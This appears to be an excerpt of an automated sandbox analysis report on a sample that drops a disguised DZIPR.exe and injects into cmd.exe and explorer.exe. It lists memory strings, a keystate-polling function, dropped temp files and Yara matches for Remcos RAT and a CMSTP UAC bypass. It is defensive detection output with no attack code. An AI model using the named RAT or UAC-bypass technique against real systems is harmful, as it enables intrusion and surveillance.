Source: hello.exe, 0000000B.00000003.1378606402.0000000002FA2000.00000004.00000020.00020000.00000000.sdmp, hello.exe, 0000000B.00000003.1379419274.0000000002430000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 0000000C.00000003.1386533387.0000000003D9B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/CPS0
Source: DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: DZIPR.exe, 0000000C.00000002.1398577312.000000000353D000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.0000000005524000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F1C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A19000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.0000000005225000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C34000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.000000000514A000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.000000000552B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046B6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.info-zip.org/
Source: DZIPR.exe, 0000000C.00000003.1386533387.0000000003D9B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.repairfile.com
Source: DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.symauth.com/cps0(
Source: DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, DZIPR.exe, 0000000C.00000002.1398188269.000000000343A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.symauth.com/rpa00
Source: DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.vmware.com/0
Source: DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.vmware.com/0/
Source: DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://d.symcb.com/cps0%
Source: DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://d.symcb.com/rpa0
Source: edb.log.18.dr	String found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
Source: svchost.exe, 00000012.00000003.1494645538.00000174C5570000.00000004.00000800.00020000.00000000.sdmp, edb.log.18.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
Source: DZIPR.exe.12.dr	String found in binary or memory: https://www.datanumen.com/%https://www.datanumen.com/zip-repair/
Source: DZIPR.exe.12.dr	String found in binary or memory: https://www.datanumen.com/contact/0https://www.datanumen.com/update/dzipr/dzipr.inf
Source: DZIPR.exe.12.dr	String found in binary or memory: https://www.datanumen.com/support/
Source: DZIPR.exe.12.dr	String found in binary or memory: https://www.datanumen.com/zip-repair-order/2https://www.datanumen.com/socialmedia/facebook.htm
Source: hello.exe, 0000000B.00000003.1378606402.0000000002FA2000.00000004.00000020.00020000.00000000.sdmp, hello.exe, 0000000B.00000003.1379419274.0000000002430000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 0000000C.00000003.1386533387.0000000003D9B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.datanumen.com/zip-repair/
Source: DZIPR.exe, 0000000C.00000002.1398188269.000000000343A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.digicert.c
Source: DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.digicert.com/CPS0

Source: C:\Users\user\DZIPR.exe	Code function: 12_2_6FE304EE GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageW,	12_2_6FE304EE
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 13_2_6C9204EE GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageW,	13_2_6C9204EE
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 19_2_6FEB04EE GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageW,	19_2_6FEB04EE

Source: Yara match	File source: 20.2.cmd.exe.55000c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.cmd.exe.5ff00c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.cmd.exe.57d00c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.cmd.exe.5ff00c8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.cmd.exe.58300c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.cmd.exe.57d00c8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.cmd.exe.55000c8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.cmd.exe.58300c8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001A.00000002.1827230846.00000000005CF000.00000008.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.1679023505.00000000004F9000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.2075718056.00000000057D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2009928671.0000000005830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.2074816955.0000000000369000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.2008670032.0000000000459000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.1679242775.0000000005FF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.1827119501.0000000005500000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 7620, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 8068, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 8164, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 6732, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 4044, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 6116, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 2056, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 1180, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\gnqpmvvlbu, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\paogviura, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\rjhlrgwt, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\lejp, type: DROPPED

E-Banking Fraud

Yara detected Remcos RAT

Source: Yara match	File source: 20.2.cmd.exe.55000c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.cmd.exe.5ff00c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.cmd.exe.57d00c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.cmd.exe.5ff00c8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.cmd.exe.58300c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.cmd.exe.57d00c8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.cmd.exe.55000c8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.cmd.exe.58300c8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000016.00000002.1679023505.00000000004F9000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.2075718056.00000000057D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2009928671.0000000005830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.2074816955.0000000000369000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.2008670032.0000000000459000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.1679242775.0000000005FF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.1827119501.0000000005500000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 7620, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 8068, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 8164, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 6732, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 4044, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 6116, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 2056, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 1180, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\gnqpmvvlbu, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\paogviura, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\rjhlrgwt, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\lejp, type: DROPPED

System Summary

Malicious sample detected (through community Yara rule)

Source: 20.2.cmd.exe.4fb0b57.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 32.2.explorer.exe.55bfb57.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 24.2.cmd.exe.52ba757.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 14.2.cmd.exe.5573a8a.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 12.2.DZIPR.exe.35e05ce.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 22.2.explorer.exe.4a68a8a.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 12.2.DZIPR.exe.359a901.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 20.2.cmd.exe.55000c8.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 20.2.cmd.exe.55000c8.7.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 20.2.cmd.exe.55000c8.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 14.2.cmd.exe.5ff00c8.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 14.2.cmd.exe.5ff00c8.7.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 14.2.cmd.exe.5ff00c8.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 14.2.cmd.exe.55b8b57.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 32.2.explorer.exe.55c0757.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 28.2.cmd.exe.57d00c8.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 28.2.cmd.exe.57d00c8.7.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 28.2.cmd.exe.57d00c8.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 14.2.cmd.exe.5ff00c8.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 14.2.cmd.exe.5ff00c8.7.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 14.2.cmd.exe.5ff00c8.7.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 22.2.explorer.exe.4aae757.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 26.2.explorer.exe.cc8b57.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 24.2.cmd.exe.58300c8.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 24.2.cmd.exe.58300c8.7.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 24.2.cmd.exe.58300c8.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 28.2.cmd.exe.57d00c8.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 28.2.cmd.exe.57d00c8.7.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 28.2.cmd.exe.57d00c8.7.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 33.2.explorer.exe.474ab57.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 28.2.cmd.exe.5199a8a.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 28.2.cmd.exe.51deb57.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 20.2.cmd.exe.4f6ba8a.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 33.2.explorer.exe.4705a8a.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 24.2.cmd.exe.52b9b57.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 22.2.explorer.exe.4aadb57.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 32.2.explorer.exe.557aa8a.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 12.2.DZIPR.exe.35df9ce.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 20.2.cmd.exe.4fb1757.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 24.2.cmd.exe.5274a8a.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 20.2.cmd.exe.55000c8.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 20.2.cmd.exe.55000c8.7.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 20.2.cmd.exe.55000c8.7.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 26.2.explorer.exe.cc9757.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 28.2.cmd.exe.51df757.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 14.2.cmd.exe.55b9757.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 26.2.explorer.exe.c83a8a.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 24.2.cmd.exe.58300c8.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 24.2.cmd.exe.58300c8.7.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 24.2.cmd.exe.58300c8.7.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 33.2.explorer.exe.474b757.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0000001A.00000002.1827195478.00000000005CB000.00000004.00000001.01000000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000016.00000002.1679023505.00000000004F9000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000001C.00000002.2075718056.00000000057D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000018.00000002.2009928671.0000000005830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000021.00000002.2074816955.0000000000369000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000020.00000002.2008670032.0000000000459000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000000E.00000002.1679242775.0000000005FF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000014.00000002.1827119501.0000000005500000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: cmd.exe PID: 7620, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: cmd.exe PID: 8068, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: explorer.exe PID: 8164, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: cmd.exe PID: 6732, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: explorer.exe PID: 4044, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: cmd.exe PID: 6116, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: explorer.exe PID: 2056, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: explorer.exe PID: 1180, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: C:\Users\user\AppData\Local\Temp\gnqpmvvlbu, type: DROPPED	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: C:\Users\user\AppData\Local\Temp\gnqpmvvlbu, type: DROPPED	Matched rule: REMCOS_RAT_variants Author: unknown
Source: C:\Users\user\AppData\Local\Temp\gnqpmvvlbu, type: DROPPED	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\paogviura, type: DROPPED	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: C:\Users\user\AppData\Local\Temp\paogviura, type: DROPPED	Matched rule: REMCOS_RAT_variants Author: unknown
Source: C:\Users\user\AppData\Local\Temp\paogviura, type: DROPPED	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\rjhlrgwt, type: DROPPED	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: C:\Users\user\AppData\Local\Temp\rjhlrgwt, type: DROPPED	Matched rule: REMCOS_RAT_variants Author: unknown
Source: C:\Users\user\AppData\Local\Temp\rjhlrgwt, type: DROPPED	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\lejp, type: DROPPED	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: C:\Users\user\AppData\Local\Temp\lejp, type: DROPPED	Matched rule: REMCOS_RAT_variants Author: unknown
